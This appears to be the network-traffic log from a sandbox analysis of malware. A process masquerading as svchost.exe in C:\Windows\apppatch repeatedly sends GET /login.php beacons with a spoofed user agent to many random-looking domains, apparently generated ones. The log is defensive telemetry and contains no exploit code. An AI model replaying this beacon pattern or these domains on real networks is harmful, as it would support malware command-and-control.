                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.395880938 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vocyzit.com
Nov 11, 2024 18:07:38.830867052 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344858|1731344858|0|1|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.9 | 56872 | 208.100.26.245 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:38.432598114 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
Nov 11, 2024 18:07:38.877521992 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:07:39.500634909 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
Nov 11, 2024 18:07:39.603194952 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:39 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:07:59.837270021 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
Nov 11, 2024 18:07:59.940177917 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:59 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:07:59.994874954 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
Nov 11, 2024 18:08:00.098310947 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:00 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 56873 | 199.191.50.83 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:38.441463947 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galyqaz.com
Nov 11, 2024 18:07:39.989993095 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                            Set-Cookie: vsid=910vr4788904590031611; expires=Sat, 10-Nov-2029 17:07:38 GMT; Max-Age=157680000; path=/; domain=galyqaz.com; HttpOnly
                                                                                                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Data Ascii: a9ae<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script
                                                                                                                                                                                                            Data Ascii: xOf("="));if(b.indexOf(";")!=-1){var c=b.substring(b.indexOf("=")+1,b.indexOf(";"))}else{var c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};wi
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990231037 CET1236INData Raw: 6e 64 6f 77 2e 63 6d 70 5f 73 74 75 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 3b 5f 5f 63 6d 70 2e 61 3d 5f 5f 63 6d 70 2e 61 7c 7c 5b 5d 3b 69 66 28 21 61 2e 6c 65 6e 67 74 68 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                            Data Ascii: ndow.cmp_stub=function(){var a=arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping"){if(a[1]===2){a[2]({gdprApplies:gdprAppliesGlobally,cmpLoaded:false,cmpStatus:"stub",displayStatus:"hidden",apiVersion:"2.2",cmpId:
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990242958 CET1236INData Raw: 7d 7d 65 6c 73 65 7b 69 66 28 67 3d 3d 3d 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 76 61 72 20 68 3d 66 61 6c 73 65 3b 5f 5f 67 70 70 2e 65 3d 5f 5f 67 70 70 2e 65 7c 7c 5b 5d 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64
                                                                                                                                                                                                            Data Ascii: }}else{if(g==="removeEventListener"){var h=false;__gpp.e=__gpp.e||[];for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].id==e){__gpp.e[d].splice(d,1);h=true;break}}return{eventName:"listenerRemoved",listenerId:e,data:h,pingData:window.cmp_gpp_pin
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.995042086 CET1236INData Raw: 5f 74 63 66 61 70 69 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53
                                                                                                                                                                                                            Data Ascii: _tcfapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.parameter)}if(typeof(c)==="object"&&c!==null&&"__gppCall" in c){var b=c.__gppCall;window.__gpp(b.command,function(h,g){var e={__gppRetu


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 56874 | 199.59.243.227 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:38.464807034 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
Nov 11, 2024 18:07:38.907919884 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1094
                                                                                                                                                                                                            x-request-id: a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                            set-cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65; expires=Mon, 11 Nov 2024 17:22:38 GMT; path=/
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Nov 11, 2024 18:07:38.908217907 CET | 528 | IN
                                                                                                                                                                                                            Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTVhODhlYTAtMzZhNy00ZTRlLThmNjAtNWQxMTM5YjFkZjY1IiwicGFnZV90aW1lIjoxNzMxMzQ0ODU4LCJwYWdlX3VybCI6I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.9 | 56875 | 23.253.46.64 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:38.540798903 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
Nov 11, 2024 18:07:39.016473055 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:33 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:07:39.016578913 CET | 169 | IN
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 56883 | 85.17.31.82 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:39.506505966 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.9 | 56884 | 154.212.231.82 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:39.512661934 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
Nov 11, 2024 18:07:40.393816948 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:40 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:07:40.410044909 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
Nov 11, 2024 18:07:40.766338110 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:40 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:07:59.932549000 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
Nov 11, 2024 18:08:00.292812109 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:00 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:08:00.504043102 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
Nov 11, 2024 18:08:00.874531984 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:00 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.9 | 56888 | 85.17.31.82 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:39.922681093 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.9 | 56905 | 13.248.169.48 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:42.060307980 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: pupydeq.com
Nov 11, 2024 18:07:42.480381012 CET | 259 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:42 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 114
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.9 | 56911 | 188.114.96.3 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:42.547264099 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
Nov 11, 2024 18:07:43.319098949 CET | 793 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:43 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SbYcdf7wY3E%2BPV3FOKhHCFJkO%2FHMmDxIhBUyzpCJEel6etCQReCfSouT3vS7XyWIn9ENt0ysOINEFiWJAit1GWhH797qtTlsvEFrn7gq7zAeiqmQuf89LZxxby3ASA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe151585c425c-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1177&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 11, 2024 18:07:43.319134951 CET | 173 | IN | Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:07:45.421735048 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
Nov 11, 2024 18:07:45.827609062 CET | 982 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uBGex7bArF0%2B9us3xBGi4T6ScgXHzBNGteLBTqsvvdfjRJb2zQHzzBjC%2FUf6a%2BvXFJgiXZvJ%2BHzzQprRSr9%2F9pB6uCZ8R2OPvXeqILTiiVZlOkL%2B2xDGUezUYaDtbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1613d90425c-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1177&sent=5&recv=7&lost=0&retrans=0&sent_bytes=966&recv_bytes=486&delivery_rate=3271084&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:08:04.734041929 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
